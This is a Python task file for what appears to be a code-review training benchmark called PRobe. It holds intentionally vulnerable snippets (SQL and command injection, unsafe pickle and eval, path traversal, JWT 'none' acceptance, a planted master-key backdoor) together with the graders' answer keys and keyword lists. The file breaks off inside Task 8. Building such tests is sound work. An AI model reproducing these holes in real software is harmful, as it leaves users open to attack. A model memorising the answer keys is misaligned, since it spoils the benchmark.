PRobe / environment /tasks.py
Thakur, Mahipal
refactor: remove legacy architecture, promote clean structure to repo root
85fab7b
"""
Task definitions for the PRobe environment.
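Tasks are graded by difficulty (ultra-easy, easy, medium, hard, adversarial).
Each task defines:
- code: Python source to review
- issues: list of ground-truth issues with grading metadata
- correct_decision: expected final review decision
- context_hints (optional): extra context revealed when an issue that names it in its unlocks field is found
Difficulty ladder (by task id):
0 ultra-easy — hints embedded in comments; bootstraps GRPO positive trajectories
1 easy — 3 issues (2 logic bugs, 1 unused variable); no category hints
2 medium — 5 security issues in an auth module
3 hard — 7 mixed issues in a data pipeline
4 medium — 5 async concurrency bugs
5 hard — 6 Flask API security issues
6 hard — 6 security issues in a JWT auth service, with a causal hint chain
7 adversarial — 2 intentional-backdoor issues; expects escalation to security review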
"""
from typing import Any
TASKS: list[dict[str, Any]] = [
# ── Task 0: Ultra-easy (bootstrap) ───────────────────────────────────────
# DESIGN INTENT: both issues have their category name spelled out in a code
# comment directly above them. A frozen weak model that simply reads the
# comments and echoes them back should reliably score > 0. This task exists
# solely to guarantee that GRPO has at least a few positive trajectories from
# training step 1.
{
"id": 0,
"name": "Bootstrap: Obvious Issues",
"difficulty": "ultra-easy",
"file_name": "bootstrap.py",
"description": (
"Review this short Python module. "
"The comments above each function hint at the kind of issue present. "
"Add a comment for each bug you find (line number, severity, category), "
"call request_changes, then submit."
),
"max_steps": 6,
"code": """\
# BUG: this loop has an off-by-one error β€” it iterates one index too far
def sum_items(data):
total = 0
for i in range(len(data) + 1): # line 4: causes IndexError on last iteration
total += data[i]
return total
# SECURITY: hardcoded credential β€” move to environment variable
def connect_db():
db_password = "s3cr3t_prod_pw" # line 11: hardcoded credential in source
return f"postgresql://admin:{db_password}@localhost/mydb"
""",
"issues": [
{
"id": "bootstrap_off_by_one",
"description": "Off-by-one: range(len+1) causes IndexError on the last iteration",
"line_range": (4, 4),
"keywords": [
"off-by-one", "off by one", "bug", "index", "indexerror",
"range", "+ 1", "len + 1", "out of bounds",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "bootstrap_hardcoded_cred",
"description": "Hardcoded password in source should be an environment variable",
"line_range": (11, 11),
"keywords": [
"hardcoded", "hard-coded", "security", "credential", "password",
"secret", "env", "environment variable", "os.environ",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
},
# ── Task 1: Easy ─────────────────────────────────────────────────────────
{
"id": 1,
"name": "Basic Bug Detection",
"difficulty": "easy",
"file_name": "utils.py",
"description": (
"Review this Python utility module. "
"Identify any bugs, logical errors, or code quality issues. "
"Add a comment for each issue you find (include line number, severity, "
"and category), then submit your review."
),
"max_steps": 15,
"code": """\
def calculate_average(numbers):
\"\"\"Calculate the average of a list of numbers.\"\"\"
total = 0
for i in range(len(numbers) + 1): # line 4
total += numbers[i]
average = total / len(numbers)
unused_result = sorted(numbers) # line 7
return average
def find_max(items):
\"\"\"Return the maximum value in a list.\"\"\"
if len(items) == 0:
return None
max_val = items[0]
for item in items:
if item > max_val:
max_val == item # line 17: should be =, not ==
return max_val
def is_palindrome(s):
\"\"\"Check if a string is a palindrome.\"\"\"
return s == s[::-1]
""",
"issues": [
{
"id": "off_by_one",
"description": "Off-by-one: range(len+1) causes IndexError on the last iteration",
"line_range": (4, 5),
"keywords": [
"off-by-one", "off by one", "range", "index", "indexerror",
"out of bounds", "len + 1", "+ 1", "index out",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "unused_variable",
"description": "unused_result is assigned but never used",
"line_range": (7, 7),
"keywords": [
"unused", "unused_result", "never used", "dead code",
"not used", "unnecessary",
],
"category": "style",
"severity": "info",
"weight": 0.5,
},
{
"id": "assignment_not_update",
"description": "max_val == item uses == (comparison) instead of = (assignment); max is never updated",
"line_range": (17, 17),
"keywords": [
"==", "assignment", "comparison", "max_val", "never update",
"not updating", "wrong operator", "should be =", "max never",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
},
# ── Task 2: Medium ───────────────────────────────────────────────────────
{
"id": 2,
"name": "Security Vulnerability Review",
"difficulty": "medium",
"file_name": "auth.py",
"description": (
"Review this authentication module for security vulnerabilities. "
"Pay careful attention to credential handling, input sanitization, "
"and cryptographic choices. Annotate every issue with its severity "
"and category, then submit your review."
),
"max_steps": 20,
"code": """\
import sqlite3
import hashlib
import os
DB_PASSWORD = "super_secret_123" # line 5
ADMIN_TOKEN = "tok_admin_abc123" # line 6
def authenticate_user(username, password):
\"\"\"Authenticate a user against the database.\"\"\"
conn = sqlite3.connect('app.db')
cursor = conn.cursor()
# line 12: f-string interpolation β†’ SQL injection
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)
user = cursor.fetchone()
conn.close()
return user is not None
def hash_password(password):
\"\"\"Hash a password for storage.\"\"\"
return hashlib.md5(password.encode()).hexdigest() # line 21
def execute_admin_command(command):
\"\"\"Execute an admin maintenance command.\"\"\"
result = eval(command) # line 25
return result
def get_user_data(user_id):
\"\"\"Fetch user profile from internal service.\"\"\"
import requests
url = f"https://internal-api/users/{user_id}"
response = requests.get(url, verify=False) # line 32
return response.json()
""",
"issues": [
{
"id": "hardcoded_credentials",
"description": "Credentials hard-coded in source (lines 5-6)",
"line_range": (5, 6),
"keywords": [
"hardcoded", "hard-coded", "hard coded", "hardcode",
"db_password", "admin_token", "plaintext credential",
"environment variable", "env var", "os.environ",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "sql_injection",
"description": "SQL injection via unsanitised f-string interpolation",
"line_range": (12, 14),
"keywords": [
"sql injection", "sql", "injection", "f-string", "parameterized",
"sanitize", "escape", "prepared statement", "placeholder",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "weak_hashing",
"description": "MD5 is cryptographically broken for password storage",
"line_range": (21, 21),
"keywords": [
"md5", "weak", "bcrypt", "argon2", "pbkdf2", "scrypt",
"cryptographic", "password hashing", "hash", "broken",
],
"category": "security",
"severity": "error",
"weight": 0.75,
},
{
"id": "arbitrary_code_execution",
"description": "eval() on untrusted input allows arbitrary code execution",
"line_range": (25, 25),
"keywords": [
"eval", "arbitrary code", "code execution", "rce",
"remote code", "dangerous", "unsafe",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "ssl_verification_disabled",
"description": "verify=False disables TLS cert validation, enabling MITM attacks",
"line_range": (32, 32),
"keywords": [
"ssl", "verify", "certificate", "mitm",
"man-in-the-middle", "tls", "verify=false", "cert",
],
"category": "security",
"severity": "error",
"weight": 0.75,
},
],
"correct_decision": "request_changes",
},
# ── Task 3: Hard ─────────────────────────────────────────────────────────
{
"id": 3,
"name": "Full Architecture and Performance Review",
"difficulty": "hard",
"file_name": "data_pipeline.py",
"description": (
"Perform a comprehensive review of this data pipeline. "
"Identify bugs, security vulnerabilities, performance bottlenecks, "
"and architectural design issues. Each comment should clearly explain "
"the problem and suggest a fix. Submit your review when done."
),
"max_steps": 30,
"code": """\
import requests
import json
import time
from threading import Thread
API_KEY = "sk-prod-abc123def456" # line 6
class DataPipeline:
def __init__(self, endpoint):
self.endpoint = endpoint
self.results = []
self.cache = {} # line 13: unbounded
def fetch_batch(self, item_ids):
\"\"\"Fetch items from the API.\"\"\"
items = []
for item_id in item_ids: # line 17: N+1 pattern
response = requests.get(
f"{self.endpoint}/items/{item_id}",
headers={"Authorization": f"Bearer {API_KEY}"},
verify=False, # line 22
)
items.append(response.json())
return items
def process_items(self, items):
\"\"\"Transform items for storage.\"\"\"
results = []
for i in range(len(items)): # line 28: use enumerate
item = items[i]
transformed = {
"id": item["id"], # line 31: KeyError not handled
"value": item["value"] * 2,
"label": item.get("label", "unknown"),
}
results.append(transformed)
self.cache[item["id"]] = transformed # line 36
return results
def run_async(self, func, *args):
\"\"\"Run function in a background thread.\"\"\"
t = Thread(target=func, args=args)
t.start()
# line 43: thread not tracked or joined β€” resource leak
def save_results(self, results, output_path):
\"\"\"Persist results to disk.\"\"\"
with open(output_path, "w") as f:
json.dump(results, f)
def retry_failed(self, failed_ids, max_retries=10): # line 50
\"\"\"Re-fetch items that previously failed.\"\"\"
for item_id in failed_ids:
for attempt in range(max_retries):
try:
result = requests.get(
f"{self.endpoint}/items/{item_id}"
)
if result.status_code == 200:
self.results.append(result.json())
break
except Exception:
time.sleep(1) # line 60: no exponential backoff
""",
"issues": [
{
"id": "hardcoded_api_key",
"description": "API key hard-coded in source instead of an environment variable",
"line_range": (6, 6),
"keywords": [
"hardcoded", "hard-coded", "hardcode", "api key", "api_key",
"environment variable", "env var", "os.environ", "sk-prod",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Reveals batch endpoint docs — shows N+1 was also avoidable
"unlocks": "api_docs_hint",
},
{
"id": "n_plus_one_requests",
"description": "One HTTP request per item (N+1 pattern); should use a bulk/batch endpoint",
"line_range": (17, 24),
"keywords": [
"n+1", "n plus 1", "batch", "bulk", "loop",
"individual request", "serial", "one request per",
],
"category": "performance",
"severity": "error",
"weight": 1.0,
},
{
"id": "ssl_disabled",
"description": "SSL certificate verification disabled (verify=False)",
"line_range": (22, 22),
"keywords": [
"ssl", "verify", "certificate", "tls",
"mitm", "verify=false", "cert",
],
"category": "security",
"severity": "error",
"weight": 0.75,
# Reveals network topology — confirms direct internet exposure
"unlocks": "network_topology_hint",
},
{
"id": "missing_key_error_handling",
"description": "Direct dict access item['id'] / item['value'] raises KeyError on unexpected payloads",
"line_range": (31, 32),
"keywords": [
"keyerror", "key error", "error handling", "missing key",
"exception", "try", ".get(", "dict access",
],
"category": "bug",
"severity": "warning",
"weight": 0.75,
},
{
"id": "unbounded_cache",
"description": "self.cache grows without bound; will cause OOM on large inputs",
"line_range": (13, 13),
"keywords": [
"unbounded", "memory leak", "cache size", "limit",
"lru", "eviction", "grow", "oom", "memory",
],
"category": "design",
"severity": "warning",
"weight": 0.75,
},
{
"id": "thread_not_joined",
"description": "Thread is started but never stored or joined β€” silent resource/exception leak",
"line_range": (40, 43),
"keywords": [
"thread", "join", "track", "resource leak",
"daemon", "not joined", "not tracked",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "no_exponential_backoff",
"description": "Retry loop sleeps 1 s flat; needs exponential backoff to avoid hammering the API",
"line_range": (50, 60),
"keywords": [
"backoff", "exponential", "retry", "sleep", "rate limit",
"jitter", "aggressive",
],
"category": "design",
"severity": "warning",
"weight": 0.5,
},
],
"correct_decision": "request_changes",
# ── Causal context hints ──────────────────────────────────────────
# Finding the hardcoded API key reveals the upstream API docs, showing
# a bulk endpoint exists β€” making the N+1 pattern even more damning.
# Finding the SSL issue reveals the network topology, confirming the
# service is directly internet-facing with no TLS termination proxy.
"context_hints": {
"api_docs_hint": (
"=== UNLOCKED: Upstream API Documentation (excerpt) ===\n"
" GET /items/{id} β€” fetch a single item\n"
" POST /items/batch β€” fetch up to 500 items in one request\n"
" body: {\"ids\": [1, 2, ...]}\n"
"NOTE: A batch endpoint already exists. The current code issues one\n"
"request per item instead of using /items/batch, amplifying the\n"
"credential-exposure risk: every request carries the leaked API_KEY."
),
"network_topology_hint": (
"=== UNLOCKED: Deployment Network Map ===\n"
" Internet β†’ DataPipeline service (no TLS proxy) β†’ upstream API\n"
" The DataPipeline pod has a public IP and no WAF in front of it.\n"
"NOTE: verify=False combined with direct internet exposure means\n"
"any network path between the pod and the upstream API is vulnerable\n"
"to a man-in-the-middle attack with no detection mechanism."
),
},
},
# ── Task 4: Medium β€” Async Concurrency ───────────────────────────────
{
"id": 4,
"name": "Async Worker Review",
"difficulty": "medium",
"file_name": "async_worker.py",
"description": (
"Review this async worker module for concurrency bugs, "
"resource leaks, and exception-handling problems. "
"Comment on every issue with its line number, severity, "
"and category, then submit your review."
),
"max_steps": 20,
"code": """\
import asyncio
import aiohttp
_counter = 0 # line 3: shared mutable state, not thread/task-safe
async def fetch_url(url: str) -> dict:
\"\"\"Fetch a URL and return JSON.\"\"\"
session = aiohttp.ClientSession() # line 7: session never closed β†’ resource leak
async with session.get(url) as resp:
return await resp.json()
async def increment_and_fetch(url: str) -> dict:
\"\"\"Increment shared counter then fetch.\"\"\"
global _counter
_counter += 1 # line 15: race condition β€” not atomic in concurrent tasks
data = fetch_url(url) # line 16: missing await β†’ returns coroutine, not result
return data
async def run_all(urls: list) -> list:
\"\"\"Run all fetches concurrently.\"\"\"
tasks = [increment_and_fetch(u) for u in urls]
results = []
for coro in tasks:
try:
result = await coro
results.append(result)
except Exception:
pass # line 27: swallows all exceptions silently
return results
async def retry_fetch(url: str, retries: int = 3) -> dict:
\"\"\"Fetch with retry logic.\"\"\"
for attempt in range(retries):
try:
return await fetch_url(url)
except Exception as e:
if attempt == retries - 1:
raise
await asyncio.sleep(1) # line 38: flat sleep, no exponential backoff
""",
"issues": [
{
"id": "shared_mutable_state",
"description": "Module-level _counter mutated by concurrent tasks without a lock",
"line_range": (3, 3),
"keywords": [
"shared", "race condition", "thread-safe", "task-safe",
"atomic", "lock", "asyncio.lock", "concurrent", "global",
"mutable", "not safe",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "unclosed_session",
"description": "aiohttp.ClientSession created inside function is never closed β†’ resource leak",
"line_range": (7, 9),
"keywords": [
"session", "not closed", "resource leak", "close", "context manager",
"async with", "clientsession", "leak", "aiohttp",
],
"category": "bug",
"severity": "error",
"weight": 1.0,
},
{
"id": "missing_await",
"description": "fetch_url(url) called without await β€” returns unawaited coroutine",
"line_range": (16, 16),
"keywords": [
"await", "missing await", "coroutine", "not awaited", "unawaited",
"returns coroutine",
],
"category": "bug",
"severity": "critical",
"weight": 1.0,
},
{
"id": "silent_exception",
"description": "bare except: pass swallows all exceptions, hiding errors",
"line_range": (27, 27),
"keywords": [
"swallow", "silent", "bare except", "exception", "pass",
"ignore", "hidden", "suppress", "logging",
],
"category": "design",
"severity": "warning",
"weight": 0.75,
},
{
"id": "no_backoff",
"description": "Retry sleep is flat 1 s; should use exponential backoff with jitter",
"line_range": (38, 38),
"keywords": [
"backoff", "exponential", "jitter", "retry", "sleep",
"flat", "rate limit",
],
"category": "design",
"severity": "warning",
"weight": 0.5,
},
],
"correct_decision": "request_changes",
},
# ── Task 5: Hard β€” Flask API Vulnerabilities ──────────────────────────
{
"id": 5,
"name": "Flask API Security Review",
"difficulty": "hard",
"file_name": "api_server.py",
"description": (
"Perform a thorough security review of this Flask REST API. "
"Look for injection flaws, path traversal, insecure deserialization, "
"sensitive data exposure, and missing access controls. "
"Comment on every issue, then submit your review."
),
"max_steps": 30,
"code": """\
import os
import pickle
import subprocess
import logging
from flask import Flask, request, jsonify, send_file
app = Flask(__name__)
SECRET_KEY = "flask-secret-hardcoded" # line 8
logging.basicConfig(level=logging.DEBUG)
@app.route("/run", methods=["POST"])
def run_command():
\"\"\"Run a system command and return output.\"\"\"
cmd = request.json.get("command", "")
# line 15: unsanitised shell command β†’ OS command injection
result = subprocess.check_output(cmd, shell=True, text=True)
return jsonify({"output": result})
@app.route("/files", methods=["GET"])
def get_file():
\"\"\"Serve a file from the data directory.\"\"\"
filename = request.args.get("name", "")
# line 23: no path normalisation β†’ path traversal
path = os.path.join("/app/data", filename)
return send_file(path)
@app.route("/load", methods=["POST"])
def load_object():
\"\"\"Deserialise a user-supplied payload.\"\"\"
data = request.get_data()
# line 30: pickle.loads on untrusted data β†’ arbitrary code execution
obj = pickle.loads(data)
return jsonify({"type": str(type(obj))})
@app.route("/login", methods=["POST"])
def login():
\"\"\"Authenticate and return a token.\"\"\"
username = request.json.get("username")
password = request.json.get("password")
# line 38: credentials logged at DEBUG level
logging.debug(f"Login attempt: username={username} password={password}")
if username == "admin" and password == SECRET_KEY:
return jsonify({"token": SECRET_KEY}) # line 41: secret returned in response
return jsonify({"error": "unauthorized"}), 401
@app.route("/admin", methods=["GET"])
def admin_panel():
\"\"\"Return admin data β€” no auth check.\"\"\"
# line 47: no authentication or authorisation check
return jsonify({"users": ["alice", "bob", "admin"], "config": {"debug": True}})
""",
"issues": [
{
"id": "hardcoded_secret",
"description": "Flask SECRET_KEY hard-coded in source; should come from env var",
"line_range": (8, 8),
"keywords": [
"hardcoded", "hard-coded", "secret_key", "environment variable",
"env var", "os.environ", "secret", "hardcode",
],
"category": "security",
"severity": "critical",
"weight": 0.75,
},
{
"id": "command_injection",
"description": "subprocess.check_output with shell=True and unsanitised user input β†’ OS command injection",
"line_range": (15, 16),
"keywords": [
"command injection", "shell injection", "shell=true", "subprocess",
"os injection", "arbitrary command", "unsanitised", "sanitize",
"injection",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Reveals server deployment config — shows shell access = full host compromise
"unlocks": "server_config_hint",
},
{
"id": "path_traversal",
"description": "No path normalisation allows ../../../etc/passwd-style traversal",
"line_range": (23, 24),
"keywords": [
"path traversal", "directory traversal", "path normaliz",
"os.path.abspath", "realpath", "../", "dot dot",
"escape", "filename", "traversal",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "insecure_deserialization",
"description": "pickle.loads on untrusted user data allows arbitrary code execution",
"line_range": (30, 31),
"keywords": [
"pickle", "deserialization", "deserialisation", "arbitrary code",
"untrusted", "rce", "remote code", "insecure deserialization",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Reveals client usage pattern — shows external clients send pickle payloads
"unlocks": "client_usage_hint",
},
{
"id": "credentials_in_logs",
"description": "Plaintext username and password written to DEBUG log",
"line_range": (38, 38),
"keywords": [
"log", "logging", "credential", "password", "sensitive",
"plaintext", "debug", "leak", "exposure",
],
"category": "security",
"severity": "error",
"weight": 0.75,
},
{
"id": "missing_auth_check",
"description": "Admin endpoint has no authentication or authorisation guard",
"line_range": (47, 47),
"keywords": [
"auth", "authentication", "authorization", "authorisation",
"access control", "no check", "unprotected", "unauthenticated",
"missing auth",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
# ── Causal context hints ──────────────────────────────────────────
# Finding command_injection reveals the host deployment context,
# escalating severity from "code bug" to "full host compromise".
# Finding insecure_deserialization reveals client usage patterns,
# confirming the /load endpoint is actively used by external scripts.
"context_hints": {
"server_config_hint": (
"=== UNLOCKED: Server Deployment Configuration ===\n"
" The Flask app runs as root inside a Docker container with:\n"
" --privileged flag set\n"
" host network mode (--network=host)\n"
" /var/run/docker.sock mounted read-write\n"
"NOTE: Command injection on this host is not just a container escape β€”\n"
"the app runs as root with Docker socket access, giving an attacker\n"
"full control of the host and all sibling containers."
),
"client_usage_hint": (
"=== UNLOCKED: Client Integration Pattern (from internal wiki) ===\n"
" # Example client code used by 3 internal services:\n"
" import pickle, requests\n"
" payload = pickle.dumps(MyObject(user_input))\n"
" requests.post('https://api.internal/load', data=payload)\n"
"NOTE: At least 3 internal services send user-controlled pickle\n"
"payloads to /load. Any of those services being compromised allows\n"
"a lateral-movement RCE attack through this endpoint."
),
},
},
# ── Task 6: Causal Chain β€” Secrets Leak Investigation ────────────────────
#
# WORLD-MODELING DESIGN
# ─────────────────────
# This task implements a *causal observation chain*:
#
# Phase 1 (lines visible from the start)
# The agent sees a Flask service with two obvious surface issues.
# Finding issue A (hardcoded JWT secret) *unlocks* Phase 2 context.
#
# Phase 2 (revealed after issue A is found)
# A hidden DB schema snippet is appended to the observation, exposing
# a privilege-escalation path that only makes sense once the secret
# leak is understood. This rewards genuine causal reasoning:
# "the leaked secret lets an attacker forge admin tokens β†’ they can
# reach the unguarded /admin/promote endpoint β†’ full privilege
# escalation."
#
# Phase 3 (revealed after issue B is found)
# After the agent flags the missing rate-limit, the server's nginx
# config fragment is revealed, showing that /auth is also missing
# the global IP-allowlist β€” confirming the attack surface is wider
# than the code alone suggests.
#
# The chained field `"unlocks"` in each issue entry names the context_key
# that the environment injects into the observation when that issue is found.
# The environment layer reads this and appends the hint to `context_hints`.
{
"id": 6,
"name": "Causal Secrets Leak Investigation",
"difficulty": "hard",
"file_name": "auth_service.py",
"description": (
"Review this authentication service carefully. "
"Some issues unlock additional context about the wider system β€” "
"read every new hint you receive before continuing. "
"Use get_context on any suspicious line to reveal surrounding detail. "
"Identify all issues, then submit your review."
),
"max_steps": 35,
"code": """\
import jwt
import sqlite3
import time
from flask import Flask, request, jsonify
app = Flask(__name__)
# ---- configuration ----------------------------------------------------------
JWT_SECRET = "super-secret-jwt-key-do-not-share" # line 9: hardcoded secret
JWT_ALGORITHM = "HS256"
# ---- helpers ----------------------------------------------------------------
def create_token(user_id: int, role: str) -> str:
payload = {
"sub": user_id,
"role": role,
"exp": time.time() + 3600,
}
return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM)
def verify_token(token: str) -> dict:
# line 23: algorithm not pinned β€” accepts ["none"] attack if lib < 2.0
return jwt.decode(token, JWT_SECRET, algorithms=["HS256", "none"])
# ---- routes -----------------------------------------------------------------
@app.route("/auth", methods=["POST"])
def authenticate():
\"\"\"Issue a JWT for valid credentials.\"\"\"
body = request.get_json(force=True)
uname = body.get("username", "")
pwd = body.get("password", "")
# line 33: no rate limiting β†’ brute-force possible
conn = sqlite3.connect("users.db")
cursor = conn.cursor()
# line 37: f-string SQL β†’ injection
cursor.execute(f"SELECT id, role FROM users WHERE username='{uname}' AND password='{pwd}'")
row = cursor.fetchone()
conn.close()
if row:
return jsonify({"token": create_token(row[0], row[1])})
return jsonify({"error": "invalid credentials"}), 401
@app.route("/admin/promote", methods=["POST"])
def promote_user():
\"\"\"Promote a user to admin β€” JWT required.\"\"\"
token = request.headers.get("Authorization", "").replace("Bearer ", "")
try:
claims = verify_token(token)
except Exception:
return jsonify({"error": "unauthorized"}), 401
# line 51: role taken directly from token β€” no DB re-validation
if claims.get("role") == "admin":
target = request.json.get("user_id")
conn = sqlite3.connect("users.db")
conn.execute(f"UPDATE users SET role='admin' WHERE id={target}") # line 55: injection
conn.commit()
conn.close()
return jsonify({"promoted": target})
return jsonify({"error": "forbidden"}), 403
""",
# ── Ground-truth issues ───────────────────────────────────────────
"issues": [
{
"id": "hardcoded_jwt_secret",
"description": "JWT_SECRET is hard-coded; anyone with source access can forge tokens",
"line_range": (9, 9),
"keywords": [
"hardcoded", "hard-coded", "jwt_secret", "secret", "jwt",
"environment variable", "env var", "os.environ", "forge",
"hardcode", "token secret",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
# Finding this issue unlocks the DB schema context hint
"unlocks": "db_schema_hint",
},
{
"id": "jwt_none_algorithm",
"description": (
"jwt.decode accepts 'none' algorithm β€” attacker can craft an "
"unsigned token and bypass signature verification"
),
"line_range": (23, 24),
"keywords": [
"none", "algorithm", "alg", "unsigned", "bypass",
"jwt", "signature", "verify", "none algorithm",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "no_rate_limit",
"description": "/auth endpoint has no rate limiting β€” susceptible to brute-force",
"line_range": (33, 34),
"keywords": [
"rate limit", "rate-limit", "brute force", "brute-force",
"throttle", "throttling", "flood", "limit", "attempts",
],
"category": "security",
"severity": "error",
"weight": 0.75,
# Finding this unlocks the nginx config hint
"unlocks": "nginx_config_hint",
},
{
"id": "sql_injection_auth",
"description": "f-string interpolation in SQL query on /auth β†’ injection",
"line_range": (37, 38),
"keywords": [
"sql injection", "sql", "injection", "f-string", "parameterized",
"sanitize", "escape", "prepared statement", "placeholder",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "role_from_token_only",
"description": (
"Role is read directly from the JWT payload without re-checking the DB β€” "
"a forged or stale token grants permanent privilege"
),
"line_range": (51, 52),
"keywords": [
"role", "token", "db", "database", "re-check", "revalidat",
"stale", "privilege", "escalation", "claims", "payload",
"not verified", "trust",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
{
"id": "sql_injection_promote",
"description": "f-string SQL in /admin/promote UPDATE query β†’ second-order injection",
"line_range": (55, 55),
"keywords": [
"sql injection", "sql", "injection", "f-string", "parameterized",
"prepared statement", "placeholder", "update", "second order",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
},
],
"correct_decision": "request_changes",
# ── Causal context hints β€” revealed progressively ─────────────────
# Each value is injected into the observation once the triggering
# issue is found. The agent must incorporate this new information
# into its ongoing world model.
"context_hints": {
"db_schema_hint": (
"=== UNLOCKED: Database Schema (users.db) ===\n"
" CREATE TABLE users (\n"
" id INTEGER PRIMARY KEY,\n"
" username TEXT UNIQUE NOT NULL,\n"
" password TEXT NOT NULL, -- stored as plaintext!\n"
" role TEXT DEFAULT 'viewer' -- 'viewer' | 'editor' | 'admin'\n"
" );\n"
"NOTE: The /admin/promote endpoint can elevate any user to 'admin'. "
"Combined with a forged JWT (from the leaked secret), an attacker "
"can reach this endpoint with admin claims and promote themselves."
),
"nginx_config_hint": (
"=== UNLOCKED: nginx reverse-proxy config (nginx.conf excerpt) ===\n"
" location /auth {\n"
" proxy_pass http://auth_service:5000;\n"
" # no ip_allowlist, no limit_req_zone\n"
" }\n"
"NOTE: The nginx layer adds no rate-limiting or IP filtering "
"in front of /auth, confirming the brute-force surface is "
"fully exposed to the internet."
),
},
},
# ── Task 7: Adversarial β€” Simple Obfuscated Backdoor ─────────────────────
#
# ADVERSARIAL DESIGN
# ──────────────────
# A malicious contributor submitted a "fix for timing issues" but embedded
# a deliberate backdoor: a hardcoded bypass credential that looks like a
# leftover debug constant, plus a subtle branch that lets any request with
# X-Debug-Token skip authentication entirely.
#
# The agent must:
# 1. Find the bypass credential AND the debug-token branch
# 2. Classify BOTH as intentional_backdoor (not accidental_bug)
# 3. Choose escalate_to_security_review (not request_changes)
#
# Partial credit: finding issues but misclassifying β†’ partial reward only
{
"id": 7,
"name": "Adversarial: Debug Bypass Backdoor",
"difficulty": "adversarial",
"file_name": "session_manager.py",
"description": (
"This PR was submitted by an external contributor as a 'timing fix'. "
"Review this session management module carefully. "
"Classify each issue as either 'accidental_bug' or 'intentional_backdoor'. "
"If you find evidence of a deliberate backdoor, escalate to security review "
"instead of requesting changes."
),
"max_steps": 25,
"escalation_required": True,
"code": """\
import hmac
import hashlib
import os
import time
# Timing-safe comparison helper added in this PR
_DEBUG_MASTER_KEY = "dbg-bypass-2024-xK9" # line 7: "leftover" debug constant
SESSION_TIMEOUT = 3600
def verify_session(token: str, stored_hash: str) -> bool:
\"\"\"Verify a session token using timing-safe comparison.\"\"\"
# line 13: debug bypass β€” any request with this key skips verification
if token == _DEBUG_MASTER_KEY:
return True
expected = hashlib.sha256(token.encode()).hexdigest()
return hmac.compare_digest(expected, stored_hash)
def create_session(user_id: int) -> dict:
\"\"\"Create a new session for a user.\"\"\"
token = os.urandom(32).hex()
return {
"user_id": user_id,
"token": token,
"expires_at": time.time() + SESSION_TIMEOUT,
"created_at": time.time(),
}
def is_expired(session: dict) -> bool:
\"\"\"Check if a session has expired.\"\"\"
return time.time() > session["expires_at"]
def refresh_session(session: dict) -> dict:
\"\"\"Extend session expiry if it is still valid.\"\"\"
if is_expired(session):
raise ValueError("Cannot refresh expired session")
session["expires_at"] = time.time() + SESSION_TIMEOUT
return session
""",
"issues": [
{
"id": "backdoor_master_key",
"description": (
"Hardcoded _DEBUG_MASTER_KEY is a deliberate backdoor credential "
"that bypasses all authentication β€” not a leftover debug constant"
),
"line_range": (7, 7),
"keywords": [
"hardcoded", "backdoor", "bypass", "master key", "debug key",
"intentional", "deliberate", "_debug_master_key", "secret",
"authentication bypass",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "git_blame_hint",
},
{
"id": "backdoor_bypass_branch",
"description": (
"The token == _DEBUG_MASTER_KEY branch unconditionally returns True, "
"granting any caller full session access without a valid token"
),
"line_range": (13, 15),
"keywords": [
"bypass", "backdoor", "unconditional", "always true", "skip",
"debug_master_key", "comparison", "authentication bypass",
"returns true", "branch",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
},
],
"correct_decision": "escalate_to_security_review",
"context_hints": {
"git_blame_hint": (
"=== UNLOCKED: Git Blame β€” session_manager.py line 7 ===\n"
" commit a3f9c12 (external-contributor, 3 days ago)\n"
" Author: pr-bot-4471 <noreply@external.io>\n"
" Message: 'fix: add timing-safe comparison, remove legacy debug artifacts'\n"
"\n"
"NOTE: The commit message claims to REMOVE debug artifacts, yet this\n"
"line was ADDED in this commit. The contributor's account (pr-bot-4471)\n"
"was created 4 days ago and has no prior commit history in this org.\n"
"This strongly suggests the 'debug constant' was intentionally planted."
),
},
},
# ── Task 8: Adversarial — Compound Backdoor (JWT + Timing Oracle) ─────────
#
# ADVERSARIAL DESIGN
# ──────────────────
# The PR claims to "harden JWT validation". In reality it introduces TWO
# coordinated backdoor components that are only dangerous together:
# Component A (line 7): weakens the HMAC secret to a known value
# Component B (line 34): introduces a timing oracle via non-constant-time compare
#
# Neither component alone is immediately catastrophic, but together they allow
# an attacker to: (1) use the known weak secret to forge a valid JWT,
# then (2) use the timing oracle to confirm which tokens are accepted,
# enabling account takeover without any brute-force detection.
#
# This is the hardest adversarial task — requires multi-step causal reasoning.
{
"id": 8,
"name": "Adversarial: Compound Backdoor (JWT Hardening PR)",
"difficulty": "adversarial",
"file_name": "jwt_validator.py",
"description": (
"This PR was submitted as a 'JWT validation hardening'. "
"Review the changes carefully. Some issues may only be dangerous in combination. "
"Use get_context to investigate suspicious lines before commenting. "
"Classify each issue as 'accidental_bug' or 'intentional_backdoor'. "
"Escalate to security review if you find coordinated backdoor components."
),
"max_steps": 35,
"escalation_required": True,
"code": """\
import jwt
import hmac
import hashlib
import time
# PR description: 'Harden JWT validation β€” use deterministic secret derivation'
# line 7: secret derived from a fixed seed β€” looks like a 'standardisation' change
JWT_SECRET = hashlib.md5(b"internal-seed-v1").hexdigest() # line 7
